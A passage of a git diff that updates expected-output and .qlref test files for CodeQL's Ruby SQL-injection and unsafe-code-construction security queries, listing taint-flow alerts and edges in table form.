| ActiveRecordInjection.rb:99:21:99:26 | call to params | user-provided value | +| ActiveRecordInjection.rb:107:20:107:55 | "name = '#{...}'" | ActiveRecordInjection.rb:107:31:107:36 | call to params | ActiveRecordInjection.rb:107:20:107:55 | "name = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:107:31:107:36 | call to params | user-provided value | +| ActiveRecordInjection.rb:111:19:111:54 | "name = '#{...}'" | ActiveRecordInjection.rb:111:30:111:35 | call to params | ActiveRecordInjection.rb:111:19:111:54 | "name = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:111:30:111:35 | call to params | user-provided value | +| ActiveRecordInjection.rb:113:18:113:35 | ...[...] | ActiveRecordInjection.rb:113:18:113:23 | call to params | ActiveRecordInjection.rb:113:18:113:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:113:18:113:23 | call to params | user-provided value | +| ActiveRecordInjection.rb:115:26:115:40 | ...[...] | ActiveRecordInjection.rb:115:26:115:31 | call to params | ActiveRecordInjection.rb:115:26:115:40 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:115:26:115:31 | call to params | user-provided value | +| ActiveRecordInjection.rb:116:28:116:42 | ...[...] | ActiveRecordInjection.rb:116:28:116:33 | call to params | ActiveRecordInjection.rb:116:28:116:42 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:116:28:116:33 | call to params | user-provided value | +| ActiveRecordInjection.rb:117:25:117:49 | "b #{...}" | ActiveRecordInjection.rb:117:30:117:35 | call to params | ActiveRecordInjection.rb:117:25:117:49 | "b #{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:117:30:117:35 | call to params | user-provided value | +| ActiveRecordInjection.rb:118:27:118:51 | "b #{...}" | ActiveRecordInjection.rb:118:32:118:37 | call to params | ActiveRecordInjection.rb:118:27:118:51 | "b #{...}" | This SQL query depends on a $@. 
| ActiveRecordInjection.rb:118:32:118:37 | call to params | user-provided value | +| ActiveRecordInjection.rb:119:21:119:35 | ...[...] | ActiveRecordInjection.rb:119:21:119:26 | call to params | ActiveRecordInjection.rb:119:21:119:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:119:21:119:26 | call to params | user-provided value | +| ActiveRecordInjection.rb:120:21:120:35 | ...[...] | ActiveRecordInjection.rb:120:21:120:26 | call to params | ActiveRecordInjection.rb:120:21:120:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:120:21:120:26 | call to params | user-provided value | +| ActiveRecordInjection.rb:121:20:121:34 | ...[...] | ActiveRecordInjection.rb:121:20:121:25 | call to params | ActiveRecordInjection.rb:121:20:121:34 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:121:20:121:25 | call to params | user-provided value | +| ActiveRecordInjection.rb:123:23:123:47 | ...[...] | ActiveRecordInjection.rb:123:23:123:28 | call to params | ActiveRecordInjection.rb:123:23:123:47 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:123:23:123:28 | call to params | user-provided value | +| ActiveRecordInjection.rb:127:19:127:30 | ...[...] | ActiveRecordInjection.rb:127:19:127:24 | call to params | ActiveRecordInjection.rb:127:19:127:30 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:127:19:127:24 | call to params | user-provided value | +| ActiveRecordInjection.rb:129:29:129:39 | ...[...] | ActiveRecordInjection.rb:129:29:129:34 | call to params | ActiveRecordInjection.rb:129:29:129:39 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:129:29:129:34 | call to params | user-provided value | +| ActiveRecordInjection.rb:141:20:141:32 | ... + ... | ActiveRecordInjection.rb:135:10:135:15 | call to params | ActiveRecordInjection.rb:141:20:141:32 | ... + ... | This SQL query depends on a $@. 
| ActiveRecordInjection.rb:135:10:135:15 | call to params | user-provided value | +| ActiveRecordInjection.rb:174:21:174:44 | ...[...] | ActiveRecordInjection.rb:174:21:174:26 | call to params | ActiveRecordInjection.rb:174:21:174:44 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:174:21:174:26 | call to params | user-provided value | +| ActiveRecordInjection.rb:188:27:188:76 | "this is an unsafe annotation:..." | ActiveRecordInjection.rb:188:59:188:64 | call to params | ActiveRecordInjection.rb:188:27:188:76 | "this is an unsafe annotation:..." | This SQL query depends on a $@. | ActiveRecordInjection.rb:188:59:188:64 | call to params | user-provided value | +| ActiveRecordInjection.rb:201:37:201:41 | query | ActiveRecordInjection.rb:206:5:206:10 | call to params | ActiveRecordInjection.rb:201:37:201:41 | query | This SQL query depends on a $@. | ActiveRecordInjection.rb:206:5:206:10 | call to params | user-provided value | +| ActiveRecordInjection.rb:210:43:210:104 | "SELECT * FROM users WHERE id ..." | ActiveRecordInjection.rb:206:5:206:10 | call to params | ActiveRecordInjection.rb:210:43:210:104 | "SELECT * FROM users WHERE id ..." | This SQL query depends on a $@. | ActiveRecordInjection.rb:206:5:206:10 | call to params | user-provided value | +| ActiveRecordInjection.rb:211:35:211:96 | "SELECT * FROM users WHERE id ..." | ActiveRecordInjection.rb:206:5:206:10 | call to params | ActiveRecordInjection.rb:211:35:211:96 | "SELECT * FROM users WHERE id ..." | This SQL query depends on a $@. | ActiveRecordInjection.rb:206:5:206:10 | call to params | user-provided value | +| ActiveRecordInjection.rb:216:38:216:53 | "role = #{...}" | ActiveRecordInjection.rb:222:29:222:34 | call to params | ActiveRecordInjection.rb:216:38:216:53 | "role = #{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:222:29:222:34 | call to params | user-provided value | +| ArelInjection.rb:6:20:6:61 | "SELECT * FROM users WHERE nam..." 
| ArelInjection.rb:4:12:4:17 | call to params | ArelInjection.rb:6:20:6:61 | "SELECT * FROM users WHERE nam..." | This SQL query depends on a $@. | ArelInjection.rb:4:12:4:17 | call to params | user-provided value | +| ArelInjection.rb:7:39:7:80 | "SELECT * FROM users WHERE nam..." | ArelInjection.rb:4:12:4:17 | call to params | ArelInjection.rb:7:39:7:80 | "SELECT * FROM users WHERE nam..." | This SQL query depends on a $@. | ArelInjection.rb:4:12:4:17 | call to params | user-provided value | +| PgInjection.rb:14:15:14:18 | qry1 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:14:15:14:18 | qry1 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | +| PgInjection.rb:15:21:15:24 | qry1 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:15:21:15:24 | qry1 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | +| PgInjection.rb:20:22:20:25 | qry2 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:20:22:20:25 | qry2 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | +| PgInjection.rb:21:28:21:31 | qry2 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:21:28:21:31 | qry2 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | +| PgInjection.rb:32:29:32:32 | qry3 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:32:29:32:32 | qry3 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | +| PgInjection.rb:44:29:44:32 | qry3 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:44:29:44:32 | qry3 | This SQL query depends on a $@. 
| PgInjection.rb:6:12:6:17 | call to params | user-provided value | edges | ActiveRecordInjection.rb:8:25:8:28 | name | ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | provenance | AdditionalTaintStep | | ActiveRecordInjection.rb:8:25:8:28 | name | ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | provenance | AdditionalTaintStep | 
@@ -223,52 +272,3 @@ nodes | PgInjection.rb:43:5:43:8 | qry3 : String | semmle.label | qry3 : String | | PgInjection.rb:44:29:44:32 | qry3 | semmle.label | qry3 | subpaths -#select -| ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:23:77:28 | call to params | ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:23:77:28 | call to params | user-provided value | -| ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:38:77:43 | call to params | ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:38:77:43 | call to params | user-provided value | -| ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:23:77:28 | call to params | ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:23:77:28 | call to params | user-provided value | -| ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:38:77:43 | call to params | ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:38:77:43 | call to params | user-provided value | -| ActiveRecordInjection.rb:16:13:16:26 | "name=#{...}" | ActiveRecordInjection.rb:77:23:77:28 | call to params | ActiveRecordInjection.rb:16:13:16:26 | "name=#{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:23:77:28 | call to params | user-provided value | -| ActiveRecordInjection.rb:30:16:30:24 | condition | ActiveRecordInjection.rb:174:21:174:26 | call to params | ActiveRecordInjection.rb:30:16:30:24 | condition | This SQL query depends on a $@. 
| ActiveRecordInjection.rb:174:21:174:26 | call to params | user-provided value | -| ActiveRecordInjection.rb:42:30:42:44 | ...[...] | ActiveRecordInjection.rb:42:30:42:35 | call to params | ActiveRecordInjection.rb:42:30:42:44 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:42:30:42:35 | call to params | user-provided value | -| ActiveRecordInjection.rb:46:18:46:32 | ...[...] | ActiveRecordInjection.rb:46:18:46:23 | call to params | ActiveRecordInjection.rb:46:18:46:32 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:46:18:46:23 | call to params | user-provided value | -| ActiveRecordInjection.rb:50:20:50:42 | "id = '#{...}'" | ActiveRecordInjection.rb:50:29:50:34 | call to params | ActiveRecordInjection.rb:50:20:50:42 | "id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:50:29:50:34 | call to params | user-provided value | -| ActiveRecordInjection.rb:55:21:55:43 | "id = '#{...}'" | ActiveRecordInjection.rb:55:30:55:35 | call to params | ActiveRecordInjection.rb:55:21:55:43 | "id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:55:30:55:35 | call to params | user-provided value | -| ActiveRecordInjection.rb:59:21:59:45 | call to [] | ActiveRecordInjection.rb:59:31:59:36 | call to params | ActiveRecordInjection.rb:59:21:59:45 | call to [] | This SQL query depends on a $@. | ActiveRecordInjection.rb:59:31:59:36 | call to params | user-provided value | -| ActiveRecordInjection.rb:64:22:64:46 | call to [] | ActiveRecordInjection.rb:64:32:64:37 | call to params | ActiveRecordInjection.rb:64:22:64:46 | call to [] | This SQL query depends on a $@. | ActiveRecordInjection.rb:64:32:64:37 | call to params | user-provided value | -| ActiveRecordInjection.rb:68:16:68:21 | <<-SQL | ActiveRecordInjection.rb:69:21:69:26 | call to params | ActiveRecordInjection.rb:68:16:68:21 | <<-SQL | This SQL query depends on a $@. 
| ActiveRecordInjection.rb:69:21:69:26 | call to params | user-provided value | -| ActiveRecordInjection.rb:75:20:75:47 | "user.id = '#{...}'" | ActiveRecordInjection.rb:75:34:75:39 | call to params | ActiveRecordInjection.rb:75:20:75:47 | "user.id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:75:34:75:39 | call to params | user-provided value | -| ActiveRecordInjection.rb:81:32:81:54 | "id = '#{...}'" | ActiveRecordInjection.rb:81:41:81:46 | call to params | ActiveRecordInjection.rb:81:32:81:54 | "id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:81:41:81:46 | call to params | user-provided value | -| ActiveRecordInjection.rb:86:23:86:35 | ...[...] | ActiveRecordInjection.rb:86:23:86:28 | call to params | ActiveRecordInjection.rb:86:23:86:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:86:23:86:28 | call to params | user-provided value | -| ActiveRecordInjection.rb:90:17:90:31 | ...[...] | ActiveRecordInjection.rb:90:17:90:22 | call to params | ActiveRecordInjection.rb:90:17:90:31 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:90:17:90:22 | call to params | user-provided value | -| ActiveRecordInjection.rb:91:19:91:33 | ...[...] | ActiveRecordInjection.rb:91:19:91:24 | call to params | ActiveRecordInjection.rb:91:19:91:33 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:91:19:91:24 | call to params | user-provided value | -| ActiveRecordInjection.rb:95:18:95:35 | ...[...] | ActiveRecordInjection.rb:95:18:95:23 | call to params | ActiveRecordInjection.rb:95:18:95:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:95:18:95:23 | call to params | user-provided value | -| ActiveRecordInjection.rb:99:21:99:35 | ...[...] | ActiveRecordInjection.rb:99:21:99:26 | call to params | ActiveRecordInjection.rb:99:21:99:35 | ...[...] | This SQL query depends on a $@. 
| ActiveRecordInjection.rb:99:21:99:26 | call to params | user-provided value | -| ActiveRecordInjection.rb:107:20:107:55 | "name = '#{...}'" | ActiveRecordInjection.rb:107:31:107:36 | call to params | ActiveRecordInjection.rb:107:20:107:55 | "name = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:107:31:107:36 | call to params | user-provided value | -| ActiveRecordInjection.rb:111:19:111:54 | "name = '#{...}'" | ActiveRecordInjection.rb:111:30:111:35 | call to params | ActiveRecordInjection.rb:111:19:111:54 | "name = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:111:30:111:35 | call to params | user-provided value | -| ActiveRecordInjection.rb:113:18:113:35 | ...[...] | ActiveRecordInjection.rb:113:18:113:23 | call to params | ActiveRecordInjection.rb:113:18:113:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:113:18:113:23 | call to params | user-provided value | -| ActiveRecordInjection.rb:115:26:115:40 | ...[...] | ActiveRecordInjection.rb:115:26:115:31 | call to params | ActiveRecordInjection.rb:115:26:115:40 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:115:26:115:31 | call to params | user-provided value | -| ActiveRecordInjection.rb:116:28:116:42 | ...[...] | ActiveRecordInjection.rb:116:28:116:33 | call to params | ActiveRecordInjection.rb:116:28:116:42 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:116:28:116:33 | call to params | user-provided value | -| ActiveRecordInjection.rb:117:25:117:49 | "b #{...}" | ActiveRecordInjection.rb:117:30:117:35 | call to params | ActiveRecordInjection.rb:117:25:117:49 | "b #{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:117:30:117:35 | call to params | user-provided value | -| ActiveRecordInjection.rb:118:27:118:51 | "b #{...}" | ActiveRecordInjection.rb:118:32:118:37 | call to params | ActiveRecordInjection.rb:118:27:118:51 | "b #{...}" | This SQL query depends on a $@. 
| ActiveRecordInjection.rb:118:32:118:37 | call to params | user-provided value | -| ActiveRecordInjection.rb:119:21:119:35 | ...[...] | ActiveRecordInjection.rb:119:21:119:26 | call to params | ActiveRecordInjection.rb:119:21:119:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:119:21:119:26 | call to params | user-provided value | -| ActiveRecordInjection.rb:120:21:120:35 | ...[...] | ActiveRecordInjection.rb:120:21:120:26 | call to params | ActiveRecordInjection.rb:120:21:120:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:120:21:120:26 | call to params | user-provided value | -| ActiveRecordInjection.rb:121:20:121:34 | ...[...] | ActiveRecordInjection.rb:121:20:121:25 | call to params | ActiveRecordInjection.rb:121:20:121:34 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:121:20:121:25 | call to params | user-provided value | -| ActiveRecordInjection.rb:123:23:123:47 | ...[...] | ActiveRecordInjection.rb:123:23:123:28 | call to params | ActiveRecordInjection.rb:123:23:123:47 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:123:23:123:28 | call to params | user-provided value | -| ActiveRecordInjection.rb:127:19:127:30 | ...[...] | ActiveRecordInjection.rb:127:19:127:24 | call to params | ActiveRecordInjection.rb:127:19:127:30 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:127:19:127:24 | call to params | user-provided value | -| ActiveRecordInjection.rb:129:29:129:39 | ...[...] | ActiveRecordInjection.rb:129:29:129:34 | call to params | ActiveRecordInjection.rb:129:29:129:39 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:129:29:129:34 | call to params | user-provided value | -| ActiveRecordInjection.rb:141:20:141:32 | ... + ... | ActiveRecordInjection.rb:135:10:135:15 | call to params | ActiveRecordInjection.rb:141:20:141:32 | ... + ... | This SQL query depends on a $@. 
| ActiveRecordInjection.rb:135:10:135:15 | call to params | user-provided value | -| ActiveRecordInjection.rb:174:21:174:44 | ...[...] | ActiveRecordInjection.rb:174:21:174:26 | call to params | ActiveRecordInjection.rb:174:21:174:44 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:174:21:174:26 | call to params | user-provided value | -| ActiveRecordInjection.rb:188:27:188:76 | "this is an unsafe annotation:..." | ActiveRecordInjection.rb:188:59:188:64 | call to params | ActiveRecordInjection.rb:188:27:188:76 | "this is an unsafe annotation:..." | This SQL query depends on a $@. | ActiveRecordInjection.rb:188:59:188:64 | call to params | user-provided value | -| ActiveRecordInjection.rb:201:37:201:41 | query | ActiveRecordInjection.rb:206:5:206:10 | call to params | ActiveRecordInjection.rb:201:37:201:41 | query | This SQL query depends on a $@. | ActiveRecordInjection.rb:206:5:206:10 | call to params | user-provided value | -| ActiveRecordInjection.rb:210:43:210:104 | "SELECT * FROM users WHERE id ..." | ActiveRecordInjection.rb:206:5:206:10 | call to params | ActiveRecordInjection.rb:210:43:210:104 | "SELECT * FROM users WHERE id ..." | This SQL query depends on a $@. | ActiveRecordInjection.rb:206:5:206:10 | call to params | user-provided value | -| ActiveRecordInjection.rb:211:35:211:96 | "SELECT * FROM users WHERE id ..." | ActiveRecordInjection.rb:206:5:206:10 | call to params | ActiveRecordInjection.rb:211:35:211:96 | "SELECT * FROM users WHERE id ..." | This SQL query depends on a $@. | ActiveRecordInjection.rb:206:5:206:10 | call to params | user-provided value | -| ActiveRecordInjection.rb:216:38:216:53 | "role = #{...}" | ActiveRecordInjection.rb:222:29:222:34 | call to params | ActiveRecordInjection.rb:216:38:216:53 | "role = #{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:222:29:222:34 | call to params | user-provided value | -| ArelInjection.rb:6:20:6:61 | "SELECT * FROM users WHERE nam..." 
| ArelInjection.rb:4:12:4:17 | call to params | ArelInjection.rb:6:20:6:61 | "SELECT * FROM users WHERE nam..." | This SQL query depends on a $@. | ArelInjection.rb:4:12:4:17 | call to params | user-provided value | -| ArelInjection.rb:7:39:7:80 | "SELECT * FROM users WHERE nam..." | ArelInjection.rb:4:12:4:17 | call to params | ArelInjection.rb:7:39:7:80 | "SELECT * FROM users WHERE nam..." | This SQL query depends on a $@. | ArelInjection.rb:4:12:4:17 | call to params | user-provided value | -| PgInjection.rb:14:15:14:18 | qry1 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:14:15:14:18 | qry1 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | -| PgInjection.rb:15:21:15:24 | qry1 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:15:21:15:24 | qry1 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | -| PgInjection.rb:20:22:20:25 | qry2 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:20:22:20:25 | qry2 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | -| PgInjection.rb:21:28:21:31 | qry2 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:21:28:21:31 | qry2 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | -| PgInjection.rb:32:29:32:32 | qry3 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:32:29:32:32 | qry3 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | -| PgInjection.rb:44:29:44:32 | qry3 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:44:29:44:32 | qry3 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-089/SqlInjection.qlref b/ruby/ql/test/query-tests/security/cwe-089/SqlInjection.qlref index bcb55c8510f1..7fb79e3340de 100644 
--- a/ruby/ql/test/query-tests/security/cwe-089/SqlInjection.qlref
+++ b/ruby/ql/test/query-tests/security/cwe-089/SqlInjection.qlref
@@ -1 +1,2 @@
-queries/security/cwe-089/SqlInjection.ql
+query: queries/security/cwe-089/SqlInjection.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected
index eae7c03a716e..8232d96d8b76 100644
--- a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected
+++ b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected
@@ -1,3 +1,15 @@ +#select +| impl/unsafeCode.rb:3:17:3:25 | #{...} | impl/unsafeCode.rb:2:12:2:17 | target | impl/unsafeCode.rb:3:17:3:25 | #{...} | This string interpolation which depends on $@ is later $@. | impl/unsafeCode.rb:2:12:2:17 | target | library input | impl/unsafeCode.rb:3:5:3:27 | call to eval | interpreted as code | +| impl/unsafeCode.rb:8:30:8:30 | x | impl/unsafeCode.rb:7:12:7:12 | x | impl/unsafeCode.rb:8:30:8:30 | x | This string format which depends on $@ is later $@. | impl/unsafeCode.rb:7:12:7:12 | x | library input | impl/unsafeCode.rb:8:5:8:32 | call to eval | interpreted as code | +| impl/unsafeCode.rb:13:33:13:33 | x | impl/unsafeCode.rb:12:12:12:12 | x | impl/unsafeCode.rb:13:33:13:33 | x | This string format which depends on $@ is later $@. | impl/unsafeCode.rb:12:12:12:12 | x | library input | impl/unsafeCode.rb:13:5:13:35 | call to eval | interpreted as code | +| impl/unsafeCode.rb:29:10:29:15 | my_arr | impl/unsafeCode.rb:28:17:28:22 | my_arr | impl/unsafeCode.rb:29:10:29:15 | my_arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:28:17:28:22 | my_arr | library input | impl/unsafeCode.rb:29:5:29:27 | call to eval | interpreted as code | +| impl/unsafeCode.rb:34:10:34:12 | arr | impl/unsafeCode.rb:32:21:32:21 | x | impl/unsafeCode.rb:34:10:34:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:32:21:32:21 | x | library input | impl/unsafeCode.rb:34:5:34:24 | call to eval | interpreted as code | +| impl/unsafeCode.rb:40:10:40:12 | arr | impl/unsafeCode.rb:37:15:37:15 | x | impl/unsafeCode.rb:40:10:40:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:37:15:37:15 | x | library input | impl/unsafeCode.rb:40:5:40:24 | call to eval | interpreted as code | +| impl/unsafeCode.rb:44:10:44:12 | arr | impl/unsafeCode.rb:37:15:37:15 | x | impl/unsafeCode.rb:44:10:44:12 | arr | This array which depends on $@ is later $@. 
| impl/unsafeCode.rb:37:15:37:15 | x | library input | impl/unsafeCode.rb:44:5:44:24 | call to eval | interpreted as code | +| impl/unsafeCode.rb:49:9:49:12 | #{...} | impl/unsafeCode.rb:47:15:47:15 | x | impl/unsafeCode.rb:49:9:49:12 | #{...} | This string interpolation which depends on $@ is later $@. | impl/unsafeCode.rb:47:15:47:15 | x | library input | impl/unsafeCode.rb:51:5:51:13 | call to eval | interpreted as code | +| impl/unsafeCode.rb:55:22:55:22 | x | impl/unsafeCode.rb:54:21:54:21 | x | impl/unsafeCode.rb:55:22:55:22 | x | This string concatenation which depends on $@ is later $@. | impl/unsafeCode.rb:54:21:54:21 | x | library input | impl/unsafeCode.rb:56:5:56:13 | call to eval | interpreted as code | +| impl/unsafeCode.rb:61:10:61:12 | arr | impl/unsafeCode.rb:59:21:59:21 | x | impl/unsafeCode.rb:61:10:61:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:59:21:59:21 | x | library input | impl/unsafeCode.rb:61:5:61:23 | call to eval | interpreted as code | +| impl/unsafeCode.rb:64:10:64:13 | arr2 | impl/unsafeCode.rb:59:24:59:24 | y | impl/unsafeCode.rb:64:10:64:13 | arr2 | This array which depends on $@ is later $@. | impl/unsafeCode.rb:59:24:59:24 | y | library input | impl/unsafeCode.rb:64:5:64:25 | call to eval | interpreted as code | edges | impl/unsafeCode.rb:2:12:2:17 | target | impl/unsafeCode.rb:3:17:3:25 | #{...} | provenance | | | impl/unsafeCode.rb:7:12:7:12 | x | impl/unsafeCode.rb:8:30:8:30 | x | provenance | | 
@@ -61,15 +73,3 @@ nodes | impl/unsafeCode.rb:63:30:63:30 | y | semmle.label | y | | impl/unsafeCode.rb:64:10:64:13 | arr2 | semmle.label | arr2 | subpaths -#select -| impl/unsafeCode.rb:3:17:3:25 | #{...} | impl/unsafeCode.rb:2:12:2:17 | target | impl/unsafeCode.rb:3:17:3:25 | #{...} | This string interpolation which depends on $@ is later $@. | impl/unsafeCode.rb:2:12:2:17 | target | library input | impl/unsafeCode.rb:3:5:3:27 | call to eval | interpreted as code | -| impl/unsafeCode.rb:8:30:8:30 | x | impl/unsafeCode.rb:7:12:7:12 | x | impl/unsafeCode.rb:8:30:8:30 | x | This string format which depends on $@ is later $@. | impl/unsafeCode.rb:7:12:7:12 | x | library input | impl/unsafeCode.rb:8:5:8:32 | call to eval | interpreted as code | -| impl/unsafeCode.rb:13:33:13:33 | x | impl/unsafeCode.rb:12:12:12:12 | x | impl/unsafeCode.rb:13:33:13:33 | x | This string format which depends on $@ is later $@. | impl/unsafeCode.rb:12:12:12:12 | x | library input | impl/unsafeCode.rb:13:5:13:35 | call to eval | interpreted as code | -| impl/unsafeCode.rb:29:10:29:15 | my_arr | impl/unsafeCode.rb:28:17:28:22 | my_arr | impl/unsafeCode.rb:29:10:29:15 | my_arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:28:17:28:22 | my_arr | library input | impl/unsafeCode.rb:29:5:29:27 | call to eval | interpreted as code | -| impl/unsafeCode.rb:34:10:34:12 | arr | impl/unsafeCode.rb:32:21:32:21 | x | impl/unsafeCode.rb:34:10:34:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:32:21:32:21 | x | library input | impl/unsafeCode.rb:34:5:34:24 | call to eval | interpreted as code | -| impl/unsafeCode.rb:40:10:40:12 | arr | impl/unsafeCode.rb:37:15:37:15 | x | impl/unsafeCode.rb:40:10:40:12 | arr | This array which depends on $@ is later $@. 
| impl/unsafeCode.rb:37:15:37:15 | x | library input | impl/unsafeCode.rb:40:5:40:24 | call to eval | interpreted as code | -| impl/unsafeCode.rb:44:10:44:12 | arr | impl/unsafeCode.rb:37:15:37:15 | x | impl/unsafeCode.rb:44:10:44:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:37:15:37:15 | x | library input | impl/unsafeCode.rb:44:5:44:24 | call to eval | interpreted as code | -| impl/unsafeCode.rb:49:9:49:12 | #{...} | impl/unsafeCode.rb:47:15:47:15 | x | impl/unsafeCode.rb:49:9:49:12 | #{...} | This string interpolation which depends on $@ is later $@. | impl/unsafeCode.rb:47:15:47:15 | x | library input | impl/unsafeCode.rb:51:5:51:13 | call to eval | interpreted as code | -| impl/unsafeCode.rb:55:22:55:22 | x | impl/unsafeCode.rb:54:21:54:21 | x | impl/unsafeCode.rb:55:22:55:22 | x | This string concatenation which depends on $@ is later $@. | impl/unsafeCode.rb:54:21:54:21 | x | library input | impl/unsafeCode.rb:56:5:56:13 | call to eval | interpreted as code | -| impl/unsafeCode.rb:61:10:61:12 | arr | impl/unsafeCode.rb:59:21:59:21 | x | impl/unsafeCode.rb:61:10:61:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:59:21:59:21 | x | library input | impl/unsafeCode.rb:61:5:61:23 | call to eval | interpreted as code | -| impl/unsafeCode.rb:64:10:64:13 | arr2 | impl/unsafeCode.rb:59:24:59:24 | y | impl/unsafeCode.rb:64:10:64:13 | arr2 | This array which depends on $@ is later $@. | impl/unsafeCode.rb:59:24:59:24 | y | library input | impl/unsafeCode.rb:64:5:64:25 | call to eval | interpreted as code | diff --git a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.qlref b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.qlref index ec336901db5b..184c870500de 100644 --- a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.qlref 
